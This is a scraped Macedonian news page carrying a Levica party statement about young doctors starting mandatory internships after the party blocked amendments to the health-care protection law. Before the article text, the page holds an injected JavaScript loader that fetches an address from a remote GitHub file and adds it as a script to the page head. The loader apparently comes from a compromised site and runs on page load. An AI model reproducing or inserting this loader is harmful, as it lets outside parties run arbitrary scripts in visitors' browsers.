;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Левица: Младите лекари добија пракса откако Левица го блокираше Законот за здравствена заштита - Антропол
АктуелноЛокално

Левица: Младите лекари добија пракса откако Левица го блокираше Законот за здравствена заштита

  • Соопштение на политичката партија Левица

Откако Левица го блокираше предлог-Законот за изменување и дополнување на Законот за Здравствена Заштита, со поднесени 888 амандмани со цел да се изврши притисок на Владата, денес Министерството за Здравство извести дека младите лекари кои чекаа 3 месеци да почнат со задолжителна пракса ќе бидат распоредени во најскоро време низ институциите од мрежата на примарна здравствена заштита!

‼️Во 10 испитни сесии кои биле организирани од Лекарската Комора во текот на 2023 година стручен испит положиле вкупно 440 доктори на медицина кои ги исполнуваат условите за добивање на лиценца за работа и тоа 232 доктори на медицина само во декемвриската испитна сесија!

👉 Од 232 доктори само 40тина имаат започнато задолжителна пракса во Здравствените домови, останатите НЕ се повикани од Министерство за здравство! Додека овие млади и амбициозни лекари седат дома, парадоксално е што во Собрание се најде предлог-Закон за продолжување на можноста за работа на здравствените работници до 67 годишна возраст која ја оправдуваат преку “недостатигот на здравствен кадар”!

🚩#Левица ќе остане на курсот за реформа на здравствениот систем, како за квалитетот и цената на услугите така и за условите за работа во здравствените инситуции.